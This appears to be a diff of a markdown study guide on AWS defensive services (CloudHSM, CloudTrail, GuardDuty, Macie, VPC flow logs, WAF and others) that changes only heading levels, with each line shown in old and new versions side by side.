* As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
## HSM - Hardware Security Module # HSM - Hardware Security Module
Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
@ -338,7 +336,7 @@ Additionally, cross consideration must be made in the purchase of third party so
**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. **With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
### CloudHSM Suggestions ## CloudHSM Suggestions
1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. 1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. 2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
@ -354,7 +352,7 @@ The most common reason to use CloudHSM is compliance standards that you must mee
The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
## Amazon Athena # Amazon Athena
Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
@ -366,7 +364,7 @@ Amazon Athena supports the **hability to query S3 data that is already encrypted
SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
## AWS CloudTrail # AWS CloudTrail
This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains: This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
@ -387,11 +385,11 @@ When creating a Trail the event selectors will allow you to indicate the trail t
Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
### Log File Naing Convention ## Log File Naing Convention
![](<../.gitbook/assets/image (429).png>) ![](<../.gitbook/assets/image (429).png>)
### S3 folder structure ## S3 folder structure
![](<../.gitbook/assets/image (428).png>) ![](<../.gitbook/assets/image (428).png>)
@ -401,7 +399,7 @@ Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
![](<../.gitbook/assets/image (437).png>) ![](<../.gitbook/assets/image (437).png>)
### Aggregate Logs from Multiple Accounts ## Aggregate Logs from Multiple Accounts
* Create a Trial in the AWS account where you want the log files to be delivered to * Create a Trial in the AWS account where you want the log files to be delivered to
* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access * Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
@ -409,7 +407,7 @@ Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account
### Log Files Checking ## Log Files Checking
You can check that the logs haven't been altered by running You can check that the logs haven't been altered by running
@ -417,7 +415,7 @@ You can check that the logs haven't been altered by running
aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose] aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
``` ```
### Logs to CloudWatch ## Logs to CloudWatch
**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ **CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
@ -425,17 +423,17 @@ Note that in order to allow CloudTrail to send the logs to CloudWatch a **role**
* CreateLogStream: This allows to create a CloudWatch Logs log streams * CreateLogStream: This allows to create a CloudWatch Logs log streams
* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream * PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
### Event History ## Event History
CloudTrail Event History allows you to inspect in a table the logs that have been recorded: CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
![](<../.gitbook/assets/image (431).png>) ![](<../.gitbook/assets/image (431).png>)
### Insights ## Insights
**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, youll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. **CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, youll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
## CloudWatch # CloudWatch
Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\ Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
CloudWatch Log Event have a **size limitation of 256KB of each log line**. CloudWatch Log Event have a **size limitation of 256KB of each log line**.
@ -450,7 +448,7 @@ Events that are monitored:
* API calls that resulted in failed authorization * API calls that resulted in failed authorization
* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) * Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
### Agent Installation ## Agent Installation
You can install agents insie your machines/containers to automatically send the logs back to CloudWatch. You can install agents insie your machines/containers to automatically send the logs back to CloudWatch.
@ -460,17 +458,17 @@ You can install agents insie your machines/containers to automatically send the
A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
## Cost Explorer and Anomaly detection # Cost Explorer and Anomaly detection
This allows you to check how are you expending money in AWS services and help you **detecting anomalies**.\ This allows you to check how are you expending money in AWS services and help you **detecting anomalies**.\
Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found. Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found.
### Budgets ## Budgets
Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\ Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\
Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
## AWS Config # AWS Config
AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\ AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\
This service is **region specific**. This service is **region specific**.
@ -491,7 +489,7 @@ A configuration item or **CI** as it's known, is a key component of AWS Config.
**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. **S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
### Config Rules ## Config Rules
Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
@ -502,13 +500,13 @@ AWS have a number of **predefined rules** that fall under the security umbrella
Limit of 50 config rules per region before you need to contact AWS for an increase.\ Limit of 50 config rules per region before you need to contact AWS for an increase.\
Non compliant results are NOT deleted. Non compliant results are NOT deleted.
## SNS Topic # SNS Topic
SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\ SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\
You can have various endpoints associated to the SNS stream.\ You can have various endpoints associated to the SNS stream.\
You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification. You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification.
## Inspector # Inspector
The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security. The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security.
@ -521,7 +519,7 @@ These are the tests that AWS Inspector allow you to perform:
You can make any of those run on the EC2 machines you decide. You can make any of those run on the EC2 machines you decide.
### Element of AWS Inspector ## Element of AWS Inspector
**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\ **Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\
**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\ **Assessment Targets**: Group of EC2 instances that you want to run an assessment against\
@ -547,7 +545,7 @@ Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Ass
Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.** Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.**
{% endhint %} {% endhint %}
### **Reporting** ## **Reporting**
**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. **Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
@ -556,7 +554,7 @@ Note that nowadays AWS already allow you to **autocreate** all the necesary **co
* The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred. * The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred.
* The **full report** is the finding report + a list of rules that were passed. * The **full report** is the finding report + a list of rules that were passed.
## Trusted Advisor # Trusted Advisor
The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service. The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service.
@ -569,7 +567,7 @@ The full power and potential of AWS Trusted Advisor is only really **available i
Trusted advisor can send notifications and you can exclude items from it.\ Trusted advisor can send notifications and you can exclude items from it.\
Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.** Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**
## Amazon GuardDuty # Amazon GuardDuty
Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\ Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\
For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\ For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
@ -601,7 +599,7 @@ You pay for the processing of your log files, per 1 million events per months fr
When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\ When a user disable GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\
If you just stop it, the existing findings will remain. If you just stop it, the existing findings will remain.
## Amazon Macie # Amazon Macie
The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account. The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
@ -680,13 +678,13 @@ The research function allows to create you own queries again all Amazon Macie da
It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. It possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie.
## Route 53 # Route 53
You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working. You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working.
Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy. Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy.
## CloufFront # CloufFront
Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3. Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
@ -694,9 +692,9 @@ The log files capture data over a period of time and depending on the amount of
**By default cookie logging is disabled** but you can enable it. **By default cookie logging is disabled** but you can enable it.
## VPC # VPC
### VPC Flow Logs ## VPC Flow Logs
Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
@ -718,7 +716,7 @@ For every network interface that publishes data to the CloudWatch log group, it
![](<../.gitbook/assets/image (433).png>) ![](<../.gitbook/assets/image (433).png>)
### Subnets ## Subnets
Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\ Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\
Valid CIDR are from a /16 netmask to a /28 netmask.\ Valid CIDR are from a /16 netmask to a /28 netmask.\
@ -738,7 +736,7 @@ By default, all subnets have the automatic assigned of public IP addresses turne
If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
### VPC Peering ## VPC Peering
VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
@ -746,7 +744,7 @@ Once the peer connectivity is established, **resources in one VPC can access res
If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
## AWS Secrets Manager # AWS Secrets Manager
AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**.
@ -758,7 +756,7 @@ To allow a user form a different account to access your secret you need to autho
**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** **AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
## EMR # EMR
EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark.
@ -778,7 +776,7 @@ Once the TLS certificate provider has been configured in the security configurat
* Tez Shuffle Handler uses TLS. * Tez Shuffle Handler uses TLS.
* Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. * Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer.
## RDS - Relational Database Service # RDS - Relational Database Service
RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption. RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
@ -794,7 +792,7 @@ If you want to use the TDE method, then you must first ensure that the database
Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database.
## Amazon Kinesis Firehouse # Amazon Kinesis Firehouse
Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch.
@ -812,7 +810,7 @@ As a part of this process, it's important to ensure that both producer and consu
Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame. Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame.
## Amazon Redshift # Amazon Redshift
Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
@ -820,7 +818,7 @@ Redshift is a fully managed service that can scale up to over a petabyte in size
Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
### KMS ## KMS
During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
@ -836,7 +834,7 @@ This encrypted DEK is then sent over a secure channel and stored in Redshift sep
You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
### CloudHSM ## CloudHSM
When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
@ -848,19 +846,19 @@ If your internal security policies or governance controls dictate that you must
During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
## WAF # WAF
AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define.
So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs
### Conditions ## Conditions
Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf.
You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer.
### Rules ## Rules
Using these conditions you can create rules: For example, block request if 2 conditions are met.\ Using these conditions you can create rules: For example, block request if 2 conditions are met.\
When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.
@ -869,7 +867,7 @@ The only **difference** between a rate-based rule and a regular rule is that **r
When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
### Actions ## Actions
An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**.
@ -883,11 +881,11 @@ If an **incoming request does not meet any rule** within the Web ACL then the re
2. BlackListed IPs Block 2. BlackListed IPs Block
3. Any Bad Signatures also as Block. 3. Any Bad Signatures also as Block.
### CloudWatch ## CloudWatch
WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests.
## AWS Firewall Manager # AWS Firewall Manager
